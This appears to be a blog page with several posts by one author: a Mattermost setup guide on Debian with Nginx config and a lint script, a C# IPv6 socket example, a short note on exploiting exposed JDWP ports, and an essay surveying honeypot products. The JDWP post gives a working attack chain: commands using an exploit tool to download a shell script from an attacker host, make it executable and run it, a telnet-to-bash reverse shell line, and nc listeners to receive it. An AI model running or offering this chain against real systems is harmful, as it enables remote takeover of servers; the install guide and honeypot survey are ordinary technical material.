Setting up Mattermost on Debian Jessie

Author: Secer  Published: July 21, 2016  Category: Quality Software

WebSocket-based chat; XMPP is not supported.

 

Install Debian Jessie (x64)


1. Set up 3 machines with Debian Jessie with 2GB of RAM or more. The servers will be used for the Load Balancer, Mattermost (this must be x64 to use pre-built binaries), and Database.
2. This can also be set up all on a single server for small teams:
• I have a Mattermost instance running on a single Debian Jessie server with 1GB of RAM and 30 GB SSD
• This has been working in production for ~20 users without issue.
• The only difference in the instructions below for this method is to do everything on the same server
• Make sure the system is up to date with the most recent security patches.
• sudo apt-get update
• sudo apt-get upgrade

Set up Database Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Install PostgreSQL 9.3+ (or MySQL 5.6+)
• sudo apt-get install postgresql postgresql-contrib
• PostgreSQL created a user account called postgres. You will need to log into that account with:
• sudo -i -u postgres
• You can get a PostgreSQL prompt by typing:
• psql
• Create the Mattermost database by typing:
• postgres=# CREATE DATABASE mattermost;
• Create the Mattermost user by typing:
• postgres=# CREATE USER mmuser WITH PASSWORD 'mmuser_password';
• Grant the user access to the Mattermost database by typing:
• postgres=# GRANT ALL PRIVILEGES ON DATABASE mattermost to mmuser;
• You can exit out of PostgreSQL by typing:
• postgres=# \q
• You can exit the postgres account by typing:
• exit
• Allow Postgres to listen on all assigned IP addresses
• sudo vi /etc/postgresql/9.3/main/postgresql.conf
• Uncomment 'listen_addresses' and change 'localhost' to '*'
• Alter pg_hba.conf to allow the Mattermost server to talk to the Postgres database
• sudo vi /etc/postgresql/9.3/main/pg_hba.conf
• Add the following line to the 'IPv4 local connections' section
• host all all 10.10.10.2/32 md5
• Reload the Postgres database
• sudo /etc/init.d/postgresql reload
• Attempt to connect with the newly created user to verify everything looks good
• psql --host=10.10.10.1 --dbname=mattermost --username=mmuser --password
• mattermost=> \q

Set up Mattermost Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.1
2. Download the latest Mattermost Server by typing:
• wget https://github.com/mattermost/platform/releases/download/vX.X.X/mattermost.tar.gz
• Where vX.X.X is the latest Mattermost release version. For example, v2.0.0
• Install Mattermost under /opt
• Unzip the Mattermost Server by typing:
• tar -xvzf mattermost.tar.gz
• sudo mv mattermost /opt
• Create the storage directory for files. We assume you will have attached a large drive for storage of images and files. For this setup we will assume the directory is located at /opt/mattermost/data.
• Create the directory by typing:
• sudo mkdir -p /opt/mattermost/data
• Create a system user and group called mattermost that will run this service
• sudo useradd -r mattermost -U
• Set the mattermost account as the directory owner by typing:
• sudo chown -R mattermost:mattermost /opt/mattermost
• sudo chmod -R g+w /opt/mattermost
• Add yourself to the mattermost group to ensure you can edit these files:
• sudo usermod -aG mattermost USERNAME
• Configure Mattermost Server by editing the config.json file at /opt/mattermost/config
• cd /opt/mattermost/config
• Edit the file by typing:
• vi config.json
• Replace "DriverName": "mysql" with "DriverName": "postgres"
• Replace "DataSource": "mmuser:mostest@tcp(dockerhost:3306)/mattermost_test?charset=utf8mb4,utf8" with "DataSource": "postgres://mmuser:mmuser_password@10.10.10.1:5432/mattermost?sslmode=disable&connect_timeout=10"
• Assuming a default IP address of 10.10.10.1
• Optionally you may continue to edit configuration settings in config.json or use the System Console described in a later section to finish the configuration.
• Test the Mattermost Server
• cd /opt/mattermost/bin
• Run the Mattermost Server by typing:
• ./platform
• You should see a console log like Server is listening on :8065 letting you know the service is running.
• Stop the server for now by typing ctrl-c
• Set up Mattermost to use the systemd init daemon, which handles supervision of the Mattermost process
• sudo touch /etc/init.d/mattermost
• sudo vi /etc/init.d/mattermost
• Copy the following lines into /etc/init.d/mattermost


#! /bin/sh
### BEGIN INIT INFO
# Provides:          mattermost
# Required-Start:    $network $syslog
# Required-Stop:     $network $syslog
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Mattermost Group Chat
# Description:       Mattermost: An open-source Slack
### END INIT INFO

PATH=/sbin:/usr/sbin:/bin:/usr/bin
DESC="Mattermost"
NAME=mattermost
MATTERMOST_ROOT=/opt/mattermost
MATTERMOST_GROUP=mattermost
MATTERMOST_USER=mattermost
DAEMON="$MATTERMOST_ROOT/bin/platform"
PIDFILE=/var/run/$NAME.pid
SCRIPTNAME=/etc/init.d/$NAME

. /lib/lsb/init-functions

do_start() {
    # Return
    #   0 if daemon has been started
    #   1 if daemon was already running
    #   2 if daemon could not be started
    start-stop-daemon --start --quiet \
        --chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
        --pidfile $PIDFILE --exec $DAEMON --test > /dev/null \
        || return 1
    start-stop-daemon --start --quiet \
        --chuid $MATTERMOST_USER:$MATTERMOST_GROUP --chdir $MATTERMOST_ROOT --background \
        --make-pidfile --pidfile $PIDFILE --exec $DAEMON \
        || return 2
}

#
# Function that stops the daemon/service
#
do_stop() {
    # Return
    #   0 if daemon has been stopped
    #   1 if daemon was already stopped
    #   2 if daemon could not be stopped
    #   other if a failure occurred
    start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 \
        --pidfile $PIDFILE --exec $DAEMON
    RETVAL="$?"
    [ "$RETVAL" = 2 ] && return 2
    # Wait for children to finish too if this is a daemon that forks
    # and if the daemon is only ever run from this initscript.
    # If the above conditions are not satisfied then add some other code
    # that waits for the process to drop all resources that could be
    # needed by services started subsequently. A last resort is to
    # sleep for some time.
    start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 \
        --exec $DAEMON
    [ "$?" = 2 ] && return 2
    # Many daemons don't delete their pidfiles when they exit.
    rm -f $PIDFILE
    return "$RETVAL"
}

case "$1" in
    start)
        [ "$VERBOSE" != no ] && log_daemon_msg "Starting $DESC" "$NAME"
        do_start
        case "$?" in
            0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
            2)   [ "$VERBOSE" != no ] && log_end_msg 1 ;;
        esac
        ;;
    stop)
        [ "$VERBOSE" != no ] && log_daemon_msg "Stopping $DESC" "$NAME"
        do_stop
        case "$?" in
            0|1) [ "$VERBOSE" != no ] && log_end_msg 0 ;;
            2)   [ "$VERBOSE" != no ] && log_end_msg 1 ;;
        esac
        ;;
    status)
        status_of_proc "$DAEMON" "$NAME" && exit 0 || exit $?
        ;;
    restart|force-reload)
        #
        # If the "reload" option is implemented then remove the
        # 'force-reload' alias
        #
        log_daemon_msg "Restarting $DESC" "$NAME"
        do_stop
        case "$?" in
            0|1)
                do_start
                case "$?" in
                    0) log_end_msg 0 ;;
                    1) log_end_msg 1 ;; # Old process is still running
                    *) log_end_msg 1 ;; # Failed to start
                esac
                ;;
            *)
                # Failed to stop
                log_end_msg 1
                ;;
        esac
        ;;
    *)
        echo "Usage: $SCRIPTNAME {start|stop|status|restart|force-reload}" >&2
        exit 3
        ;;
esac

exit 0


• Make sure that /etc/init.d/mattermost is executable
• sudo chmod +x /etc/init.d/mattermost
• On reboot, systemd will generate a unit file from the headers in this init script and install it in /run/systemd/generator.late/
Note: This setup can also be done using a systemd unit, usable for non-Debian systems, such as Arch Linux. The unit file is as follows:
# cat /etc/systemd/system/mattermost.service


[Unit]
Description=Mattermost
After=network.target
[Service]
User=mattermost
ExecStart=/home/mattermost/mattermost/bin/platform
WorkingDirectory=/home/mattermost/mattermost
Restart=always
RestartSec=30
[Install]
WantedBy=multi-user.target

# systemctl start mattermost
# systemctl enable mattermost

Set up Nginx Server


1. For the purposes of this guide we will assume this server has an IP address of 10.10.10.3
2. We use Nginx for proxying requests to the Mattermost Server. The main benefits are:
• SSL termination
• http to https redirect
• Port mapping :80 to :8065
• Standard request logs
• Install Nginx on Debian with
• sudo apt-get install nginx
• Verify Nginx is running
• curl http://10.10.10.3
• You should see a Welcome to nginx! page
• You can manage Nginx with the following commands
• sudo service nginx stop
• sudo service nginx start
• sudo service nginx restart
• Map a FQDN (fully qualified domain name) like mattermost.example.com to point to the Nginx server.
• Configure Nginx to proxy connections from the internet to the Mattermost Server
• Create a configuration for Mattermost
• sudo touch /etc/nginx/sites-available/mattermost
• Below is a sample configuration with the minimum settings required to configure Mattermost


server {
    server_name mattermost.example.com;
    location / {
        client_max_body_size 50M;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $http_host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Frame-Options SAMEORIGIN;
        proxy_pass http://10.10.10.2:8065;
    }
}


• Remove the existing file with
• sudo rm /etc/nginx/sites-enabled/default
• Link the mattermost config by typing:
• sudo ln -s /etc/nginx/sites-available/mattermost /etc/nginx/sites-enabled/mattermost
• Restart Nginx by typing:
• sudo service nginx restart
• Verify you can see Mattermost thru the proxy by typing:
• curl http://localhost
• You should see a page titled Mattermost - Signup

Set up Nginx with SSL (Recommended)


1. You can use a free and open certificate authority such as Let's Encrypt. This is how to proceed:
• sudo apt-get install git
• git clone https://github.com/letsencrypt/letsencrypt
• cd letsencrypt
• Make sure port 80 is not in use by stopping Nginx
• sudo service nginx stop
• netstat -na | grep ':80.*LISTEN'
• ./letsencrypt-auto certonly --standalone
• This command will download packages and run the instance; after that you will have to enter your domain name
• You can find your certificate in /etc/letsencrypt/live
• Modify the file at /etc/nginx/sites-available/mattermost and add the following lines:


server {
    listen 80;
    server_name mattermost.example.com;
    return 301 https://$server_name$request_uri;
}

server {
    listen 443 ssl;
    server_name mattermost.example.com;
    ssl on;
    ssl_certificate /etc/letsencrypt/live/yourdomainname/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/yourdomainname/privkey.pem;
    ssl_session_timeout 5m;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';
    ssl_prefer_server_ciphers on;
    ssl_session_cache shared:SSL:10m;
    location / {
        gzip off;
        proxy_set_header X-Forwarded-Ssl on;
        client_max_body_size 50M;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $http_host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_set_header X-Frame-Options SAMEORIGIN;
        proxy_pass http://10.10.10.2:8065;
    }
}


• Be sure to restart Nginx
• sudo service nginx start
• Add the following line to cron so the cert will renew every month
• crontab -e
• @monthly /home/YOURUSERNAME/letsencrypt/letsencrypt-auto certonly --reinstall -d yourdomainname && sudo service nginx reload

Finish Mattermost Server setup


1. Navigate to https://mattermost.example.com and create a team and user.
2. The first user in the system is automatically granted the system_admin role, which gives you access to the System Console.
3. From the town-square channel click the dropdown and choose the System Console option
4. Update Email Settings. We recommend using an email sending service. The example below assumes Amazon SES.
• Set Send Email Notifications to true
• Set Require Email Verification to true
• Set Feedback Name to No-Reply
• Set Feedback Email to mattermost@example.com
• Set SMTP Username to AFIADTOVDKDLGERR
• Set SMTP Password to DFKJoiweklsjdflkjOIGHLSDFJewiskdjf
• Set SMTP Server to email-smtp.us-east-1.amazonaws.com
• Set SMTP Port to 465
• Set Connection Security to TLS
• Save the Settings
• Update File Settings
• Change Local Directory Location from ./data/ to /mattermost/data
• Update Log Settings
• Set Log to The Console to false
• Update Rate Limit Settings
• Set Vary By Remote Address to false
• Set Vary By HTTP Header to X-Real-IP
• Feel free to modify other settings.
• Restart the Mattermost Service by typing:
• sudo restart mattermost
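The Nginx site file above is what the WebSocket proxying, the X-Real-IP keyed rate limiting just configured in the System Console, and the SSL section all depend on. The following POSIX shell lint is an added check, not part of the original guide or of Mattermost itself: it reads a site file and reports headers that are missing or TLS settings that are weak, assuming the directive spacing used in this guide. The two configs it checks are constructed for the example.

```shell
# Lint an Nginx site file for the settings the Mattermost guide relies on.
# Prints one finding per line and returns the number of findings (0 = clean).
lint_mattermost_nginx() {
    conf="$1"; n=0
    # Without both headers the WebSocket upgrade never reaches Mattermost.
    for hdr in 'Upgrade $http_upgrade' 'Connection "upgrade"'; do
        grep -Fq "proxy_set_header $hdr" "$conf" ||
            { echo "missing: proxy_set_header $hdr (WebSocket upgrade breaks)"; n=$((n+1)); }
    done
    # Rate limiting is set to vary by X-Real-IP; if Nginx does not send it,
    # every user is throttled as one address (the proxy's own).
    grep -Fq 'proxy_set_header X-Real-IP $remote_addr' "$conf" ||
        { echo "missing: proxy_set_header X-Real-IP (rate limit keys on proxy IP)"; n=$((n+1)); }
    if grep -Eq '^[[:space:]]*listen[[:space:]]+443' "$conf"; then
        grep -Eq '^[[:space:]]*ssl[[:space:]]+on;' "$conf" &&
            { echo "deprecated: 'ssl on;' ('listen 443 ssl;' is enough)"; n=$((n+1)); }
        grep -Eq 'ssl_protocols[^;]*TLSv1(\.1)?[[:space:];]' "$conf" &&
            { echo "weak: ssl_protocols still enables TLSv1/TLSv1.1"; n=$((n+1)); }
    fi
    return $n
}

# Constructed sample 1: the guide's TLS lines, but a location block that
# forgot the WebSocket and X-Real-IP headers.
WEAK_CONF=$(mktemp); GOOD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$GOOD_CONF"' EXIT
cat > "$WEAK_CONF" <<'EOF'
server {
    listen 443 ssl;
    ssl on;
    ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
    location / {
        proxy_set_header Host $http_host;
        proxy_pass http://10.10.10.2:8065;
    }
}
EOF
# Constructed sample 2: all required headers present, TLS 1.2+ only.
cat > "$GOOD_CONF" <<'EOF'
server {
    listen 443 ssl;
    ssl_protocols TLSv1.2 TLSv1.3;
    location / {
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header Host $http_host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-Proto $scheme;
        proxy_pass http://10.10.10.2:8065;
    }
}
EOF
rc=0; lint_mattermost_nginx "$WEAK_CONF" || rc=$?; echo "weak config: $rc finding(s)"
rc=0; lint_mattermost_nginx "$GOOD_CONF" || rc=$?; echo "hardened config: $rc finding(s)"
```

Run it against /etc/nginx/sites-available/mattermost after editing; a non-zero return means at least one of the guide's required settings is absent.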

http://docs.mattermost.com/install/prod-debian.html

C# socket programming with IPv6

Author: Secer  Published: July 21, 2016  Category: Code Learning

Server listening code:

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;

class Server
{
    static void Main()
    {
        // An IPv6 address assigned to this host (for a local test, IPAddress.IPv6Loopback);
        // the client must connect to the same address and port.
        IPAddress dirIP = IPAddress.Parse("fe80::e130:91d4:913b:126c");
        IPEndPoint endPoint = new IPEndPoint(dirIP, 55577);

        // AddressFamily.InterNetworkV6 is the only IPv6-specific part; the rest is as for IPv4.
        Socket serverSocket = new Socket(AddressFamily.InterNetworkV6,
                                        SocketType.Stream,
                                        ProtocolType.Tcp);
        StreamReader reader = null;
        StreamWriter writer = null;
        try
        {
            serverSocket.Bind(endPoint);
            serverSocket.Listen(int.MaxValue);
            while (true)
            {
                // Blocks until a client connects; clients are served one at a time.
                Socket clientSocket = serverSocket.Accept();
                NetworkStream ntStream = new NetworkStream(clientSocket);
                reader = new StreamReader(ntStream);
                string dataClient = reader.ReadLine();
                Console.WriteLine("Client::" + dataClient);
                if (dataClient == "Quit")
                    break;
                writer = new StreamWriter(ntStream);
                string dataServer = "Hello Client, I'm Server!";
                writer.WriteLine(dataServer);
                writer.Flush();
                Console.WriteLine("Server::" + dataServer);
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.ToString());
        }
        finally
        {
            // writer is still null if the very first client sent "Quit"
            if (reader != null) reader.Close();
            if (writer != null) writer.Close();
            serverSocket.Close();
        }
    }
}

Client connection code:

using System;
using System.IO;
using System.Net;
using System.Net.Sockets;

class Client
{
    static void Main()
    {
        // Same IPv6 address and port the server is bound to
        IPAddress direction = IPAddress.Parse("fe80::e130:91d4:913b:126c");
        IPEndPoint endPointSrv = new IPEndPoint(direction, 55577);
        Socket clientSocket = new Socket(AddressFamily.InterNetworkV6,
                                        SocketType.Stream,
                                        ProtocolType.Tcp);
        // Declared outside the try block so they can be closed in finally
        StreamReader reader = null;
        StreamWriter writer = null;
        try
        {
            clientSocket.Connect(endPointSrv);
            NetworkStream ntStream = new NetworkStream(clientSocket);
            writer = new StreamWriter(ntStream);
            string dataClient = "Hello,I'm Client! ";
            writer.WriteLine(dataClient);
            writer.Flush();
            Console.WriteLine("Client 已连接");
            // The reply is read with a StreamReader (the original used a StreamWriter here)
            reader = new StreamReader(ntStream);
            string dataServer = reader.ReadLine();
            Console.WriteLine("Server::" + dataServer);
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex.ToString());
        }
        finally
        {
            if (reader != null) reader.Close();
            if (writer != null) writer.Close();
            clientSocket.Close();
        }
    }
}

JDWP command execution vulnerability: an exploitation example

Author: Secer  Published: July 21, 2016  Category: Web Security

I haven't updated the blog for a long time, all because I've been too busy.

I happened upon a few JDWP instances and tested them; the vulnerability exists, so I'm writing a note to record it.

Nmap scan


Exploit tool: https://github.com/IOActive/jdwp-shellifier

 


To trigger **.**.**.**.ServerSocket.accept, just send a request to the web port.

 

This target's web port is 8009.

 

Technique from

http://www.wooyun.org/bugs/wooyun-2010-095744

Added: a method for getting a shell via a telnet reverse connection, using a domestic device as the example

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'wget http://x.x.x.x:2222/shell.txt -O /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd 'chmod a+x /tmp/shell.sh'

./jdwp-exp.py -t **.**.**.** -p 8000 --cmd '/tmp/shell.sh'

Contents of shell.txt (two ports are needed: one to send commands and one to receive the command output):

telnet x.x.x.x 1111 | /bin/bash | telnet x.x.x.x 3333

 

Then on the x.x.x.x server, listen with nc on ports 1111 and 3333.

Port 1111 is for sending commands; port 3333 displays the command results.

Two cmd windows:


 

nc -nnv -L -p 3333

nc -nnv -L -p 1111

Why are so many startups building "honeypots"? This article may tell you

Author: Secer  Published: July 21, 2016  Category: Hacking Techniques

Preface

Information security has developed to today's flourishing state, yet traditional security still relies on static signatures to identify attacks. With the emergence of new APT attacks, many enterprises have realized that traditional security techniques can no longer detect internal threats in time. Many of the big traditional security vendors have therefore turned to dynamic sandbox technology to solve the problem: some sell appliances, such as Symantec ATP hardware combined with SEP on the endpoint, and some, like 360 Safeguard, link to threat intelligence to detect unknown threats. These approaches mainly target the first stage of an APT attack, where the attacker obtains user information through social engineering and gets onto a personal PC on the corporate intranet via phishing or a watering-hole attack. But to reach valuable internal sensitive information, the attacker has to carry out the rest of the attack chain, including credential harvesting and intranet asset scanning. Because many industries, including financial institutions, do not allow security solutions to be installed on business servers, and sometimes not even a logging agent, deploying honeypots is currently the best solution.

When studying honeypot solutions, the aspects we currently care most about are:

What is the difference between open-source and commercial honeypots?

Do honeypots really need big-data analysis (machine learning algorithms)?

What does the business model of a honeypot startup look like?

Analysis of existing products

This section covers open-source honeypots and commercial honeypots from China and abroad.

Open-source honeypots can be divided by type as follows:

Database honeypots (typical example: ElasticSearch Honeypot)

ElasticSearch Honeypot: looking at the source, it is a handful of fake functions implemented in Go:

• Fake banner: the response returned when the root path is requested

• FakeNodes: the response returned when the /Nodes path is requested

• FakeSearch: the response returned when the /Search path is requested

• hpfeedsConnect: communicates over the hpfeeds protocol

All of these are faked function responses, so an intruder is quite likely to recognize the honeypot. I therefore recommend building the honeypot by patching the original software to add recording, although that takes considerably more development effort. Personally I suggest simulating the following Elasticsearch vulnerabilities:

ESA ID        CVE Link        Vulnerability Summary
ESA-2015-08   CVE-2015-5531   Elasticsearch versions from 1.0.0 to 1.6.0 are vulnerable to a directory traversal attack.
ESA-2015-06   CVE-2015-5377   Elasticsearch versions prior to 1.6.1 are vulnerable to an attack that can result in remote code execution.
ESA-2015-05   CVE-2015-4165   All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.
ESA-2015-02   CVE-2015-3337   All Elasticsearch versions prior to 1.5.2 and 1.4.5 are vulnerable to a directory traversal attack that allows an attacker to retrieve files from the server running Elasticsearch when one or more site plugins are installed, or when Windows is the server OS.

Take ESA-2015-08, the directory listing vulnerability, as an example: when a repository is created, Elasticsearch's parsing throws an exception and returns the content of the file it read, and from then on every read returns the content of /etc/passwd. So how should this honeypot be built? File change records need to be kept properly, and the original version should be patched to record logins and RESTful API submissions. Emulating with the real service also takes considerable development effort.

Web honeypots (typical example: Glastopf)

• Emulation of vulnerability types

• Unknown attacks

• Support for multiple database types

• HPFeeds communication

• PHP remote file inclusion through a built-in sandbox; local file inclusion via POST requests

• Adversaries usually find their victims using search engines and specially crafted search queries

• Emulation of SQL injection, crawler responses, and so on

If I were building it, I would still combine it with a WAF to refine the attack data, because there is far too much normal and abnormal URL traffic.

Service honeypots (typical example: Kippo)

Fake filesystem

• Fake user file storage

• Storage for files uploaded through the SFTP subsystem

• Emulation of specific files attackers care about, such as /etc/passwd

Fake system commands

• File upload/download commands sftp and scp, plus parsing of client wget/curl commands

• Commands executed interactively over SSH (commonly used by intruders): w, exit, cat, uname, chmod, ps, cd

Fake system configuration

• Hostname

• SSH service fingerprint

• SSH accounts and passwords

• SSH keys

Integration with external threat intelligence

• Threat intelligence on connecting IP addresses (whitelist)

• Threat-intelligence checks on the content of uploaded suspicious files

Big-data log processing

• Support for exporting logs to Elasticsearch

Open-source SSH honeypots are fairly mature today, but they still lack auditing of Bash built-in commands and of file changes.

ICS honeypots

These are outside the scope of this discussion. ICS has a fatal weakness: the communication protocols themselves are unencrypted and Wireshark sees straight through them. In my view, get ICS firewalls right first, then think about honeypots.

Other honeypots (typical example: RDPY)

RDPY: RDPY is an implementation of Microsoft's RDP remote desktop protocol built on Twisted Python. RDPY supports the standard RDP security protocol, with encryption and authentication via SSL or NLA (or via the NTLMv2 authentication protocol). Its subproject rdpy-rdphoneypot is an RDP-based honeypot that records session scenarios and replays them over the RDP protocol.
